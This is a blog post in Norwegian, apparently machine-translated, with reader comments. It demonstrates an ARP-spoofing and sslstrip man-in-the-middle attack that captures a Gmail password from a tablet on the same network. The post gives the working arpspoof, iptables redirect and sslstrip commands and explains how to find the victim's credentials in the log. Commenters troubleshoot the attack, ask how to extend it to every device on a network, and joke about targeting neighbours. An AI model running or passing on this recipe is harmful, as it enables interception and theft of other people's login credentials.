ArpSpoofing og SSlstrip i aksjon.

Hei bloggere.

For i dag har jeg et lite utvalg av hvor farlig det kan være å være koblet i et hvilket som helst nettverk uten sikkerhet for de som så mange av oss liker.

For i dag skal jeg bruke ArpSpoofing med Sslstrip for å få et Gmail-passord. For å gjøre miljøet mer kontrollert har jeg opprettet en konto som heter "testarp@gmail.com".

Og siden jeg ikke liker innledningen veldig, la oss komme i gang.

Jeg er ikke ansvarlig når som helst for hva de kan gjøre med følgende informasjon. Jeg gjør det utelukkende for pedagogiske formål

MILJØ

For denne testen har vi følgende:

1. angriper: Det er min stasjonære eller stasjonære datamaskin som har Debian Wheezy. Fra arkiver kan du installere sslstrip y dsniff å få til å ha harpspoofing

2. Offer: Offeret er en Android-nettbrett som bare vil se e-posten sin gjennom nettleseren.

3. Medium: Midten er min Cisco DPC2425-ruter

ADRESSER.

Angriperadresse: 172.26.0.2

Ruteradresse: 172.26.0.1

Offerets adresse: 172.26.0.8

ANGREPET:

For å forstå litt mer hvordan angrepet fungerer, kan du gå til min gamle POST

Det første vi vil gjøre for dette angrepet er å aktivere fremover slik at datamaskinen vår kan videresende informasjonen til offeret uten at de merker det. (Ellers ville det være et nektelse av tjenesteanfall)

For det vil vi bruke:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Hver kommando i et direkte konsollvindu.

Nå hvis vi gjør hale -f desdelinux vi ser informasjonen live og direkte

øyeblikksbilde1

Så hvordan får vi det vi vil ha?

La oss først skrive inn e-posten vår på nettbrettet. Mens vi logger på ser vi at tusenvis av ting vises på konsollen vår.

Nå som den er ferdig, la oss åpne filen vår "desdelinux" med nano

nano desdelinux

med Control + W søker vi etter noe som heter SIKKER POST.

Og vi får se noe slikt.

øyeblikksbilde2

Blant den enorme linjen som ikke kan sees, er offerets e-post og passord.

Så vi løper til høyre til vi endelig ser lyset ved enden av tunnelen.

øyeblikksbilde3

Ved en annen anledning vil vi se hvordan vi kan beskytte oss litt mot disse angrepene.

Hilsen


Legg igjen kommentaren

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *

*

*

  1. Ansvarlig for dataene: Miguel Ángel Gatón
  2. Formålet med dataene: Kontroller SPAM, kommentaradministrasjon.
  3. Legitimering: Ditt samtykke
  4. Kommunikasjon av dataene: Dataene vil ikke bli kommunisert til tredjeparter bortsett fra ved juridisk forpliktelse.
  5. Datalagring: Database vert for Occentus Networks (EU)
  6. Rettigheter: Når som helst kan du begrense, gjenopprette og slette informasjonen din.

  1.   @Jlcmux sa

    Jeg benytter anledningen til å si at da innlegget ble publisert, var ikke kommandoene riktig.

    Kommandoen iptables på slutten mangler 8080 som er på en annen linje. Og så var arpspoof-kommandoene på samme linje. Hver kommando er på en annen linje.

    Forhåpentligvis ser redaktøren det og kan fikse det.

    Hilsener.

    1.    Håndbok for kilden sa

      Jeg har gjort rettelsene du nevner, er det greit?

      Hvis du skal sette inn kode i en foretrukket oppføring, bruk HTML-visningen og kontroller at artikkelen er korrekt før du sender den til ventende. Takk skal du ha.

  2.   Luis sa

    Det er frysende å vite at de av oss som ikke har kunnskap er så sårbare. Veldig god informasjon, selv når jeg forstår lite av emnet, skjønner jeg viktigheten. Takk skal du ha!
    Hilsen

  3.   giskard sa

    Men det fungerer bare hvis angriperen og offeret er på samme nettverk. I alle fall ser det ut til at hvis du (i samme nettverk) kobler til ved hjelp av HTTPS, skjer det ikke fordi dataene er kryptert FØR du forlater maskinen. Hvis du kobler til via HTTP (uten S), tror jeg at selv om du ser på nettverkskabelen, ser du nøklene.

    1.    @Jlcmux sa

      Det er ikke sant. Jeg hakker en gmail-nøkkel, og hvis du merker, bruker gmail https. Så? Poenget er at selv om https er sikkert, avhenger det av http. Så det er ikke så trygt.

      Tilstå ikke så mye om en https at S ikke er for Superman, det er for "trygt"

    2.    Rten sa

      det fungerer med eller uten https, jeg har prøvd det med en mer spesialisert Linux distro og det fungerer uten problemer

    3.    Håndbok for kilden sa

      Du kan nettopp bruke den til å lære de som stjeler Wi-Fi en leksjon. 😀

      Det er mer eller mindre som det de sa for lenge siden på Chema Alonsos blogg:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant sa

        Ostia, flott hva det gjør! / Og så forteller de paranoiden min hver gang jeg bruker VPN når de skal sjekke bankkontoen ...). Forresten må du se hvor kyniske folk er i kommentarene ... hvis det til slutt stjeler ...

        1.    eliotime3000. sa

          Nå må vi ta en veiledning om hvordan du oppretter og tilbyr din egen VPN-tjeneste.

      2.    Daniel sa

        Historien du kobler til er veldig interessant, den virker til og med verdig en romanbok, og dette får meg til å huske da jeg brukte internett til naboene mine, og selv om jeg sier jeg kjenner emnet, tror jeg at jeg aldri kunne se de sanne dimensjonene til faren for at jeg kunne vare, heldigvis for meg, endret de bare passordet til WPA2, og det var der historien min med ISP begynte haha

    4.    Mauritius sa

      Det er derfor tittelen sier Sslstrip i aksjon.

      Det fungerer, så lenge angriperen er i midten

  4.   anon sa

    Hvilken bølge jobber du med prisme? -.-
    nei.
    Hva venter du på å sende forespørselen din XD
    hilsen
    bra innlegg

  5.   auroszx sa

    Interessant, jeg skal ta en pedagogisk test senere ... Kanskje jeg til og med kan fjerne passordet til WiFi og ha det gøy litt 😛
    Uansett, kan du gjøre noe lignende for å sende forskjellige sider til de målene ønsket? For eksempel vil de åpne Facebook, og jeg omdirigerer dem til Google? 😛

    1.    @Jlcmux sa

      Ja. Men det er en helt annen rull.

      Kanskje jeg legger det ut senere.

  6.   siste nybegynner sa

    veldig bra innlegg, disse emnene er veldig lærerike, nå må vi kunne motvirke dette angrepet, siden noen (som meg) kobler seg til offentlige nettverk (universitetet for eksempel) vil det være nyttig å unngå det.

    Greetings!

  7.   bare en annen-dl-bruker sa

    Det fungerte ikke for meg 🙁

  8.   wow sa

    Noe svikter meg her, bortsett fra at https-tilkoblingene er kryptert gjennom et serversertifikat (når du har sertifikatet på maskinen din, er nettleseren din ansvarlig for kryptering) med iptables omdirigerer du port 80 (http), ikke 443 som er https

    1.    @Jlcmux sa

      Jeg trodde det også. Poenget er at selv om https er "sikkert", avhenger det dessverre av http. Så sslstrip utnytter det, det får nettleseren til å tro at den bruker https-legitimasjon, men det er det ikke.

      1.    wow sa

        hellig dritt! men nettleseren skal se en advarsel som "dette sertifikatet kommer fra et mistenkelig nettsted eller noe sånt" ... Jeg må definitivt gjøre tester XD

        1.    @Jlcmux sa

          Nei, absolutt ingenting kommer ut.

  9.   bare en annen-dl-bruker sa

    Det fungerte til slutt for meg
    Jeg er koblet til et WEP-nettverk med passord, og det viste meg passordet uansett.

    En forespørsel. Kan du gjøre den samme prosedyren, men for alle datamaskiner som er koblet til nettverket, i stedet for å ha et enkelt offer?

    1.    @Jlcmux sa

      Ja det kan du. Men jeg har ikke gjort eksperimenter. Prøv det selv og fortell oss hvordan du har det.

  10.   sinnick19 sa

    Det eneste jeg får med dette er at offerets maskin går offline, men sslstripen viser meg ingenting: /

    1.    @Jlcmux sa

      Du må deaktivere brannmuren et øyeblikk. Eller i det minste aktivere innkommende tilkoblinger.

  11.   Herr Black sa

    Probe og jeg kunne bare se brukernavnet og passordet til facebooksiden, i gmail fant jeg ikke noe resultat i loggen, også trengte jeg bare en linje med arpspoof «arpspoof -i -t«. På den annen side kunne ikke offermaskinen åpne noen sider. Jeg vil fortsette å undersøke, det er veldig interessant. En hjelp for de som bruker Manjaro, pakkene som skal installeres er: dsniff (her er arpspoff), vridd og python2-pyopenssl. Sslstrip kan lastes ned herfra: http://www.thoughtcrime.org/software/sslstrip/
    For å kjøre det $ python2 sslstrip.py
    Hilsener.

  12.   Herr Black sa

    Det kom ikke ut, men arpspoof-linjen er: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert sa

    jeg gjør akkurat det du sier:

    ekko "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Problemet er at offeret, som er en annen pc som jeg har her på rommet mitt, blir stående uten forbindelse til det punktet at jeg må starte ruteren på nytt, hva kan jeg gjøre, hjelp meg.

    En annen ting, jeg jobber med en virtuell maskin, og når jeg kjører iwconfig-kommandoen, vises ikke wlan0, og heller ikke når jeg kjører ifconfig, men hvis jeg har internett på den virtuelle maskinen min, hva med et eth0-grensesnitt.